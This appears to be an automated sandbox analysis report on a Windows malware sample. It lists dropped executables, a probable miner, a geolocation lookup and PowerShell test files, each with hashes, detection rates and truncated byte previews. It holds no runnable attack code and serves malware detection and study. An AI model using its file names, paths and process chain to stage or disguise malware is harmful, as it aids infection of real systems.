..^.t.)..%.B..l........CW..v..[.ZB.....O....8:L.=....-.[E.B...(.P.;".V..+[..e>....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\newtpp[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\34D7.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80896
Entropy (8bit):	6.424014659383267
Encrypted:	false
SSDEEP:	1536:ZwjmKHFmav82kFifdWXwCsgTT+vr3Rzmxwz6fYc6on:+6tOMFif3CsKavr0xwz6gc6on
MD5:	0C883B1D66AFCE606D9830F48D69D74B
SHA1:	FE431FE73A4749722496F19B3B3CA0B629B50131
SHA-256:	D921FC993574C8BE76553BCF4296D2851E48EE39B958205E69BDFD7CF661D2B1
SHA-512:	C047452A23EFAD4262479FBFEB5E23F9497D7CEFD4CBB58E869801206669C2A0759698C70D18050316798D5D939B989537FDCE3842AA742449F5E08ED7FA60A5
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.pj)..9)..9)..9 ..9...9Q..8+..9..C9+..9..A9(..9...9+..9..s9-..9)..9...9..e9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L.....3g.....................d.......u............@..........................p...............................................$.......................................................................................................................text............................... ..`.rdata...3.......4..................@..@.data...(/...@... ..................@...................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\nxmr[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\78476062.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	5827584
Entropy (8bit):	7.718261688436852
Encrypted:	false
SSDEEP:	98304:ZMknXV8IFUX81qQ6lLYhJ/N0TB4HBDxWcLKamiwPZhsSZLZ1wpxGN:ZBnXV86UiqrlLY/8AW6YZPZf6HGN
MD5:	13B26B2C7048A92D6A843C1302618FAD
SHA1:	89C2DFC01AC12EF2704C7669844EC69F1700C1CA
SHA-256:	1753AD35ECE25AB9A19048C70062E9170F495E313D7355EBBBA59C38F5D90256
SHA-512:	D6AFF89B61C9945002A6798617AD304612460A607EF1CFBDCB32F8932CA648BCEE1D5F2E0321BB4C58C1F4642B1E0ECECC1EB82450FDEC7DFF69B5389F195455
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 76%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f...............&......X................@.............................pY.......Y...`... .............................................. Y.4....PY.......X.X............`Y.0.............................X.(...................."Y.P............................text...P...........................`..`.data.....V.......V.................@....rdata...9....X..:...xX.............@..@.pdata..X.....X.......X.............@..@.xdata........X.......X.............@..@.bss..........Y..........................idata..4.... Y.......X.............@....CRT....`....0Y.......X.............@....tls.........@Y.......X.............@....rsrc........PY.......X.............@....reloc..0....`Y.......X.............@..B........................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\1[1]

Download File

Process:	C:\Windows\sysnldcvmr.exe
File Type:	data
Category:	dropped
Size (bytes):	9472
Entropy (8bit):	7.981622207506476
Encrypted:	false
SSDEEP:	192:yqI/498XpWFB+Ql2fZr4uwrUdj1lrPzllMyyoYPVfMd/d7t2qWI:yqIIIY2V5jvrPzllMyytWP
MD5:	7E7536E0FA6860F7862748890C9E61FE
SHA1:	0A909E6C4CE788CE979D4B003A3C37FE0B60C64A
SHA-256:	EE89D2EC2308A0A434B37F9842C28E40BA58A9DF71353AACE6200DD2C727F6AA
SHA-512:	73FAF4C7F261A98683A57F56A6717462F59FFCA1CEBAD0CCFBCD5EA78B6D763BF5455373C8E5AB88DDB4ABC06469D984EB4D9368880C56E8A70322D9ECCF6617
Malicious:	false
Reputation:	unknown
Preview:	...Eqn..7...n..%.v u&PU...K:.P.X..w.j>..?h.r."B...H+<.._..i@.Ft...(...sIe.0.al....BM._....$"..o..6.....65.....&..#&.sQ.e.n...R...H...........x....S...M....".....<..z...j.g..><C.9..1.[.:...1W/...8.....c....h..[...m.....Q....%...bp.....=.=P....$..?./...5.:.j.. .0.....9{.).RLd..uN.."..a<.S..".&..F......o.qI.}S}..J...&.fR.t:.......D...x..._....B)O.UDd....x..7D..a.}Zk)...%..j_7...?.W..g.....l...`.<..#..Z....#....b.p1....PT.............b.....k...G...x.7.[..5......!R...F..mw...5...2)......ZTN.y8..A..(..`_.^Z..`."7.w.......\.=....Bz-......s'.D.....x....e%s.....I,._8..<1Bp.).a.0Q.._I^fB..oa....F..>O.0X.5(e../k.aa..3.9...[...........r...J&3...V.:.9.._.k".ft...{w.TsV.H.cNE...R...tK.B:...c.4+...}U....2M..!. hm..%C>=....{g...._...{NBa.A~}_...R.....z.y.j..m.9.......Os.+z......Q.[Z.`..Y..i.@.R......j.a...A.aBmA.@zY!...+o...UH.W...O$1.fs.K:.0:*.,....a\n.>....\.P(L..r...@..xSi..e.;.b...\|.H.y.W9.>..Sgx.%2.S\.4.`.zG...$..8..)w".......K.vW...`..R

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\4[1]

Download File

Process:	C:\Windows\sysnldcvmr.exe
File Type:	data
Category:	dropped
Size (bytes):	63232
Entropy (8bit):	7.997234577455722
Encrypted:	true
SSDEEP:	1536:Rb6G5CuemZ88BNRpjVsWAtKhKqjWfD8L4/MKALBEBtiElxxaH4+HeXw:RHeL8BfatK/K8kXANr6jmf
MD5:	42680A341BA5D6CF2013FF1F5A3039F1
SHA1:	BCF24346BA857DC8DFFA7C7FF369359FB9969966
SHA-256:	CD1D10AF836743F1EE93A0CA03D8072D8FC5C44022C846809C5E0482228D6E04
SHA-512:	89FE01D9EAEFF01E73D4AD11473DADAFCC7CB2DEB6C8BA98B7C64158C120F45E4134F70DCC17004B506E2A0D783CEDE797DBE5850AAA91C79402BA54C80FCB34
Malicious:	false
Reputation:	unknown
Preview:	3........-;.)V..........X.....\.Z.^S....,n..q....h. I.....e...;Zz.8'.....4F..Ar..a=X.6O4.3f..b.-.\uu. .y7...........0p\k..,...NXn8....0...4e.I...O.D.Dda...Fq..2._UO....7.w.k.......Nl.....cH..k=.kRd..-07<.x..a\......Y..2J...Y.i..?...s..Vb.h\.../.'.=.;..._....9..M.S..;.f.......x.;{l.B@,..L.F.?.w.1.b.CV}....7...=..s/..pQ.[....Gm.+P.3]..1....Y[)..e...=t.\|..wOQ.;}GF...:.m. ...k.'.....h.....:.....r...g.rM$...wyg...S.....^.`.3s....^Ye.2..55.4.K.J.L!............j.^R4.o6g........?....{.....x..}.iX........1?r.W.-m..4.v....&n...%...l:_y.....Na.u..T...}..T....!..........V.9D.K.LM.9..#.,f...\.c...^.870.(7.A.V.B..4.s..y..m....E.$............I...R.H.....F'!....,..a........'.s..\$.q...HV...[..9..R..Sr..zKI7.4...Hy.N.tnC. wY.8I.h..6....;>.E.D...b..y..EWI..c.h.P&="1."......'...R.;.....a_-U.y./....2....4(s...u....QyG.O.8...........`.)u3g9lW2.(.P>2.^'..r.{..g_.....!0i.....-.(bg...T...?J.f.il.C2`.-.N..=TM....[..........1.a..@... .#o;...R.`_....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\json[1].json

Download File

Process:	C:\Users\user\AppData\Local\Temp\2910625892.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	963
Entropy (8bit):	5.014904284428935
Encrypted:	false
SSDEEP:	12:tkluJnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qluNdRNuKyGX85jvXhNlT3/7AcV9Wro
MD5:	B66CFB6461E507BB577CDE91F270844E
SHA1:	6D952DE48032731679F8718D1F1C3F08202507C3
SHA-256:	E231BBC873E9B30CCA58297CAA3E8945A4FC61556F378F2C5013B0DDCB7035BE
SHA-512:	B5C1C188F10C9134EF38D0C5296E7AE95A7A486F858BE977F9A36D63CBE5790592881F3B8D12FEBBF1E555D0A9868632D9E590777E2D3143E74FD3A44C55575F
Malicious:	false
Reputation:	unknown
Preview:	{. "geoplugin_request":"8.46.123.228",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\pei[1].exe

Download File

Process:	C:\Users\user\Desktop\f5TWdT5EAc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	5.019293738763387
Encrypted:	false
SSDEEP:	96:zMG7Mp1ySr4P6M/r52Od0NDiIp+BYU81fPVdjPbuJxGEOaRh2qh3C7tCEF1K:ACMp/ViVQtp+OJcJxTOchthcFw
MD5:	08DAFE3BB2654C06EAD4BB33FB793DF8
SHA1:	D1D93023F1085EED136C6D225D998ABF2D5A5BF0
SHA-256:	FC16C0BF09002C93723B8AB13595DB5845A50A1B6A133237AC2D148B0BB41700
SHA-512:	9CF2BD749A9EE6E093979BC0D3AACFBA03AD6469C98FF3EF35CE5D1635A052E4068AC50431626F6BA8649361802F7FB2FFFFB2B325E2795C54B7014180559C99
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......gd.##.`p#.`p#.`p}.p!.`p}.p".`p}.p6.`p...p(.`p#.ap..`p}.p .`p*}.p".`pRich#.`p................PE..L...rRCg..................................... ....@..........................`............@.................................l$.......@.......................P.......................................#..@............ ...............................text...:........................... ..`.rdata..4.... ......................@..@.data........0......................@....rsrc........@....... ..............@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Reputation:	unknown
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\1171111125.exe

Download File

Process:	C:\Windows\sysnldcvmr.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	9216
Entropy (8bit):	5.301254923853182
Encrypted:	false
SSDEEP:	96:9M3DMm8B/SSgd5DFU8h+h8XZH0XoNubKZH0NFJxGE9ZMz2FFhBC7tCEdfXI:9ix8Bqk8h+6pHMbwHiFJxT7MzmFhiR4
MD5:	323CB4364490F83204B51B0F7F3766F4
SHA1:	8687A571D083FFEF105D0CE61D46845B4DBA4793
SHA-256:	EFADE1639D80B3262D0730A70525DBD703AB51499291B3A1C55B2AA32E74030E
SHA-512:	96A5470E361EE1A164BB637E1BC14434050CBF12D3D3BCAE240575D08270DC8038582965CDDDE508C220EC6AA695DFC87D0633F6735EC3D6E637C4CB25B42A3D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 75%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........$..EE..EE..EE..b..OE..L=..FE..EE...E..L=..DE..L=..PE..L=..FE..L=..DE..RichEE..................PE..L...h.Og..................................... ....@..........................`............@..................................#.......@.......................P.......................................#..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......."..............@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1657630034.exe

Download File

Process:	C:\Windows\sysnldcvmr.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	62976
Entropy (8bit):	3.8463342467781225
Encrypted:	false
SSDEEP:	384:dQQ4VsFTmMdMdMdMdMdMdMdMdMoMdMdMdMdMdMdMdMdMnMdMdMdMdMdMdMdMdMoU:WQyQ
MD5:	77C5EB90118287F666886FC34210C176
SHA1:	D7A59BF4F014304E29DF1868EF82FE782432120A
SHA-256:	59A96D66D97E202829EA79A5E0BBF71981C05A13AB700B0120F7D99D33515080
SHA-512:	5577D167AD4748AD7917FF3F792A0CAA01BA40638BDF7143C1403D2EFCAD4019F8DA49719AE0AD88FEBDC1EF64207FBA7CA5BB96DC12C334571D30E2E8F22CF9
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,CE.B.E.B.E.B.b.9.M.B.L...F.B.E.C.u.B.L...D.B.L...P.B.L...F.B.L...D.B.RichE.B.................PE..L....~Ig............................O........ ....@..........................0......'.....@.................................,#..x............................ ..\...................................h"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...............................@..@.reloc..6.... ......................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\2688734187.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\78476062.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	5827584
Entropy (8bit):	7.718261688436852
Encrypted:	false
SSDEEP:	98304:ZMknXV8IFUX81qQ6lLYhJ/N0TB4HBDxWcLKamiwPZhsSZLZ1wpxGN:ZBnXV86UiqrlLY/8AW6YZPZf6HGN
MD5:	13B26B2C7048A92D6A843C1302618FAD
SHA1:	89C2DFC01AC12EF2704C7669844EC69F1700C1CA
SHA-256:	1753AD35ECE25AB9A19048C70062E9170F495E313D7355EBBBA59C38F5D90256
SHA-512:	D6AFF89B61C9945002A6798617AD304612460A607EF1CFBDCB32F8932CA648BCEE1D5F2E0321BB4C58C1F4642B1E0ECECC1EB82450FDEC7DFF69B5389F195455
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 76%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f...............&......X................@.............................pY.......Y...`... .............................................. Y.4....PY.......X.X............`Y.0.............................X.(...................."Y.P............................text...P...........................`..`.data.....V.......V.................@....rdata...9....X..:...xX.............@..@.pdata..X.....X.......X.............@..@.xdata........X.......X.............@..@.bss..........Y..........................idata..4.... Y.......X.............@....CRT....`....0Y.......X.............@....tls.........@Y.......X.............@....rsrc........PY.......X.............@....reloc..0....`Y.......X.............@..B........................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\2779421088.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1171111125.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	449536
Entropy (8bit):	6.408263129357923
Encrypted:	false
SSDEEP:	12288:1O7k28xC7HMDVBjfbL5S6IZ7OGQN/RutyU3ivG/Vt9:+OS6IZ7QN/R8yoaG/P
MD5:	BD0CAD52FD3A6537CC7AF21852619340
SHA1:	7831109E87D28DA448E5DDC8FA63A3E9750086D3
SHA-256:	E58B1261B10B7340A80DB815A8E4A7C9A4FD1C0F29101D1A148104D9E70165FA
SHA-512:	08F414ABDDDC0CA9CDC2E9D5FA796273B4E85FDD8EDF49ABC3F61E958DE6E20F3F3E94983301EAAA5D46C806CB0B424498B2F21418FDBF67209CEFDCEDDEA09B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........z...)...)...)...(...)...(...)...(...)...(...)...(...)...(...)...(...)...)..)...)...).9.(...).9.)...).9.(...)Rich...)........................PE..L..._{_d...............%.\|...f....................@.......................................@..................................y..(................................"..@n...............................m..@............................................text...C{.......\|.................. ..`.textbss.................................rdata..............................@..@.data....;.......2...p..............@....rsrc...............................@..@.reloc...".......$..................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\2910625892.exe

Download File

Process:	C:\Windows\sysnldcvmr.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	66560
Entropy (8bit):	6.261032733553188
Encrypted:	false
SSDEEP:	768:Hu7cdcclVqrj9dRkiE+pUZMZBxL7xEZ6stdhtZAZjDej6kbUatIJa5IWU:O7cdPVq/Jp0gLte6AYZnkL5IW
MD5:	69A5D3C6E993B5A1BAFACF806647DF7D
SHA1:	E5ABBA95E1588950C6388C9950417C2FB8AEBCE2
SHA-256:	E59F9453537C852771A7F8E7EFFD1304480E449A4349F1AB97D44911B698B5F9
SHA-512:	53D45ADC53695C293113DB525AC42330D508D1C58CDF5501EC98F45C4457F37A2254B4B37889AFDD57966D510D77C9EB35B7D8C558C2A473D14E7DF134F42DE3
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............i.X.i.X.i.X..bX.i.X..tX.i.X...X.i.X.i.X.i.X..sX.i.X..fX.i.XRich.i.X................PE..L.....Qg.....................V......gL............@..........................@......K.....@.....................................x............................ ..4.......................................@...............4............................text............................... ..`.rdata...........0..................@..@.data...............................@....rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\34D7.exe

Download File

Process:	C:\Users\user\Desktop\f5TWdT5EAc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	5.019293738763387
Encrypted:	false
SSDEEP:	96:zMG7Mp1ySr4P6M/r52Od0NDiIp+BYU81fPVdjPbuJxGEOaRh2qh3C7tCEF1K:ACMp/ViVQtp+OJcJxTOchthcFw
MD5:	08DAFE3BB2654C06EAD4BB33FB793DF8
SHA1:	D1D93023F1085EED136C6D225D998ABF2D5A5BF0
SHA-256:	FC16C0BF09002C93723B8AB13595DB5845A50A1B6A133237AC2D148B0BB41700
SHA-512:	9CF2BD749A9EE6E093979BC0D3AACFBA03AD6469C98FF3EF35CE5D1635A052E4068AC50431626F6BA8649361802F7FB2FFFFB2B325E2795C54B7014180559C99
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......gd.##.`p#.`p#.`p}.p!.`p}.p".`p}.p6.`p...p(.`p#.ap..`p}.p .`p*}.p".`pRich#.`p................PE..L...rRCg..................................... ....@..........................`............@.................................l$.......@.......................P.......................................#..@............ ...............................text...:........................... ..`.rdata..4.... ......................@..@.data........0......................@....rsrc........@....... ..............@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\640832494.exe

Download File

Process:	C:\Windows\sysnldcvmr.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	54784
Entropy (8bit):	4.680039558316825
Encrypted:	false
SSDEEP:	768:8zWMj/0vaXDiTLlGCI0App3T5Kph6koMnqsq:3jEiTLXA3Dwp4ko4v
MD5:	84897CA8C1AA06B33248956AC25EC20A
SHA1:	544D5D5652069B3C5E7E29A1CA3EEA46B227BBFE
SHA-256:	023AD16F761A35BD7934E392BCF2BBF702F525303B2964E97C3E50D2D5F3EDA1
SHA-512:	C17D0E364CF29055DECE3E10896F0BBD0EBDB8D2B1C15FE68DDCD9951DD2D1545362F45AD21F26302F3DA2EB2EC81340A027CBD4C75CC28491151ECABAE65E95
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 39%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3P..w1..w1..w1..P...}1..~IS.t1..w1.."1..~IU.u1..~IC.b1..~ID.t1..~IQ.v1..Richw1..........................PE..L...#5Kg............................d#.......0....@................................./.....@.....................................................................h......................................@............0..l............................text............................... ..`.rdata..D\|...0...~..................@..@.data....'......."..................@....rsrc...............................@..@.reloc..&...........................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\78476062.exe

Download File

Process:	C:\Windows\sysnldcvmr.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	5.134070469138298
Encrypted:	false
SSDEEP:	96:vdHiIV5H6c10lqo9ZYAoQdVDCcJ+587tG6AuJxGE9btz2qhRC7tCEOhd1Q:vdHiQ5HV1wr9KA/J+izJxTZtzthyOhd
MD5:	96509AB828867D81C1693B614B22F41D
SHA1:	C5F82005DBDA43CEDD86708CC5FC3635A781A67E
SHA-256:	A9DE2927B0EC45CF900508FEC18531C04EE9FA8A5DFE2FC82C67D9458CF4B744
SHA-512:	FF603117A06DA8FB2386C1D2049A5896774E41F34D05951ECD4E7B5FC9DA51A373E3FCF61AF3577FF78490CF898471CE8E71EAE848A12812FE98CD7E76E1A9CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 91%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......k.Y/.../.../...&.`.-...&.f.....&.p.:....k..".../.......&.w.,...&.b.....Rich/...................PE..L...'V.f..................................... ....@..........................`.......e....@.................................<$.......@.......................P......................................x#..@............ ...............................text............................... ..`.rdata..,.... ......................@..@.data........0......................@....rsrc........@....... ..............@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\896429707.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\34D7.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80896
Entropy (8bit):	6.424014659383267
Encrypted:	false
SSDEEP:	1536:ZwjmKHFmav82kFifdWXwCsgTT+vr3Rzmxwz6fYc6on:+6tOMFif3CsKavr0xwz6gc6on
MD5:	0C883B1D66AFCE606D9830F48D69D74B
SHA1:	FE431FE73A4749722496F19B3B3CA0B629B50131
SHA-256:	D921FC993574C8BE76553BCF4296D2851E48EE39B958205E69BDFD7CF661D2B1
SHA-512:	C047452A23EFAD4262479FBFEB5E23F9497D7CEFD4CBB58E869801206669C2A0759698C70D18050316798D5D939B989537FDCE3842AA742449F5E08ED7FA60A5
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.pj)..9)..9)..9 ..9...9Q..8+..9..C9+..9..A9(..9...9+..9..s9-..9)..9...9..e9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L.....3g.....................d.......u............@..........................p...............................................$.......................................................................................................................text............................... ..`.rdata...3.......4..................@..@.data...(/...@... ..................@...................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0k5yrhnq.ktz.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0xabxbos.q1c.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1fufiphy.fu4.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1xxxgrpn.1eq.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2g0zdp5u.wfa.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4aqbaj5e.3sn.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
